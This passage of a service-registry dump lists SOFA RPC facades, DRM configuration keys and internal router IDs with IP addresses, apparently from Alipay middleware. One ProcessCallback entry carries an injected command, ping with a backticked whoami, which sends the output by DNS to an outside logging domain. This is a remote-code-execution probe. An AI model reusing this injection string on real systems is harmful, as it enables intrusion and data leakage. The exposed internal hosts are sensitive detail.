ertManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.template.TemplateOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.analyze.RopAnalyzeService:1.0:rop-analyze-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.234.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:morphodatatwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilebc.common.service.facade.partner.PartnerManageExtFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custview.antg.facade.accesstoken.AgATKIdentificationGlobalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.core.service.apportion.ApportionPlanCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.template.CheckListTemplateQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequote.api.L2TrustTransactionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.SyncDataMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.cpmScrollTaskConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.credible.CredibleIPWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmmemberop.common.service.facade.api.AwardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:hbtestplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.requirement.AssetRequirementPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.MessageConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_yudian_test_yd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.SecurityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:recommendOrderExpire@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_INSPECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradeexprod.common.service.facade.DepositMashupService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:kip_itemOpFlowRevokeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.mobileuser.MobileUserSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.std.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkfundbuss.common.facade.EvaluationQusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.247.151#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbadvert.biz.delivery.rpc.AdvDiscountRecommendListRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.FundUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.PcreditBizAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.loadTestAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openDegradeCreditPayDBStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.0.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:changeiteration@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.UserBetaSwitchConfig.upperBound,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:sdarttool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserAccountArQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.spider.YqPropagationUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotevent.api.HotEventRelatedEntityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotvilla.common.service.facade.api.manager.CacheManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataDRM.unknowTypeFinanceExchangeCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.entrance.ShopQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openinsight.common.service.facade.rec.api.RecPositionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.fundselling.PartnerManageFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.communityshare:name=com.alipay.mobilecommunity.biz.community.drm.CommunityShareCfgResource.communityAuditConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.intopermanager.common.service.facade.api.aistudio.MessageMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.agds.optimus.facade.dynamodule.DynaModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.189.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antcloud.uctbridge.common.service.facade.external.api.RiskQueryService:1.0:AliyunRiskQueryServiceImplRiskmapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.task.TaskConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.itransferprod.service.facade.api.PrepayItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.charge.chargeThinDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finormweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ProductPoolBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:kbadvert@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.common.service.facade.member.api.OpenCardParamsConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceOperationApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.BrandActivityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:preCreateContactHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zfundcheck.common.service.facade.RuleInfoServiceFacade:1.0:zmxyService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.ServicePointQueryService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.staff.common.service.facade.UnreportedPmsSumService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_CSACCURATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:cn.com.antcloud.acprovisioncore.common.facade.resource.facade.cache.CacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileacauth.service.facade.PCICacheService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.fortunetask.TaskSignUpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.consume.IncomeRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.censor.ReasonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zcache.tbase.cardbinMdmTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.open.InstUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:bioperation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlbs.facade.algorithm.LbsIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.parameter.PartnerParamConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:Cifmng_NewTag_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmDebugManager.cdsInfoLogOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.GuardianTaskPreCheckCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobilecsa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheSwitchDRM.cacheLoadSourceDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.biz.service.impl.rpc.trade.LifeTradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.mobileprod.common.service.facade.cta.manage.RuleManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.RuleSetService:1.0:rmaccurateService@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EBPPCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.mma.facade.api.GridViewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.blessDarwin,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.gmp.openplatform.facade.IdePackageServiceFacade:1.0:gmp-openplatform-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.49.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fininfo:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.amlcloud.common.service.facade.api.RuleRepositoryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.CategorypullFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finorm.finriskcenter.common.facade.api.guardian.TrServiceDefineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.extension.service.facade.api.ThirdPartyActivityManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantRegisterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mshopcenter:name=com.alipay.mshopcenter.common.service.facade.ldc.MCLdcDrm.ldcCZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobench.common.service.facade.service.ProdFieldMappingConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.stress.StressMgrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.clc.ClcJobService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.extension.ExtensionOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.253#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.vouchercore.service.facade.api.card.CardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.MerchantManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualBreakFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ifundcontrolmodel.service.facade.fundmodel.fundanalyze.forecast.BankAccountCashFlowFundModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfesync.facade.daas.meta.MetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetZsApplicationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.stopCheckBlock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmepcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.signcontract.SignContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.amspm.ardd.common.support.api.ScriptDataServiceFacade:1.0:payrms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mydds.common.service.facade.api.DataDecisionLDCService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.v2.AssetSpuSkuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.HandleKeyFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agds.sd.facade.huabei.AgdsCreditAmtDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementQueryStdFacade:1.0:zhiMaArrangementQueryStdFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.invoicecommercial.facade.api.QueryHistoricalInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.service.facade.common.api.ProductConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.test.OnlyForTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pvsofaserver:name=com.alipay.zcache.tbase.yingxutestRZTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acwareslifecore.common.service.facade.MessageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.ProductIndicatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.23.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.isecuritycore.service.query.facade.IntlRiskResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insassetprod.common.service.facade.property.screen.MobileScreenPicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cryptprod.common.service.facade.TranCryptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.core.ranking.propertygen.PropertyGeneratorManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-S-BIZCONF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.decisionx.facade.DataService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:RainyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:tairmanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.226.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.feed.api.FootmarkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ifcriskmatrixus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.BatchPayProdTransWithUniqueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditUserAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.zcache.tbase.revtransTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.payflux.spi.BizDispatchServiceFacade:1.0:mobilecashier_other@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:ifaatam@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.algo.kbknowledgegraph.biz.rpc.TTFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.91.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.188.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.personalmng.common.service.facade.api.CRFactorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cfmng.biz.exchange.manager.impl.ProcessPlatformSwitchDrmResource.processCutConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.defincustomer.facade.api.sensitive.SensitiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.SystemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.custgrowth.common.service.facade.PatakQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CREDITUTCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_YUQIAO_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmac_ProcessPerExecuteCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.app.pcinstprod.pcinstprod_ds.attributes.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ping `whoami`86842598-80102053-uniqueId-104003032.rce.noble.log.lynnshare.cc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.membertangram.common.service.facade.calendar.CalendarFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.open.facade.OpenFeedQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_ORDERMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileappconfig.common.service.facade.api.MobileAppManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.EnumService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inslabdsoc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.common.service.facade.api.PPayPaymentConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:WORKSPACEDC@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6272@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.shared.service.NewsInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.AllInPayAsyncNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.service.facade.api.PayTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.IndexSignalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.MstSerialFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.operation.common.service.facade.api.strategy.check.ActivityCheckItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.dal.SubscriptionGroupRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscommunity.common.service.facade.FatigueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.spi.IndustryInfoAssembleFacade:1.0:auth_pay_info_decision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.share.auto.daointerface.McenterAirUserDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.interMessageCloseBeginDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbprocess.common.service.facade.WTTicketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.application:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcommonweal.common.service.facade.api.AcwQuotaControlFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.customerv2_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.217.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.integration.rcconsultcore.RcconsultcoreServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imemberprod_certificate_callback_dispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfe.faca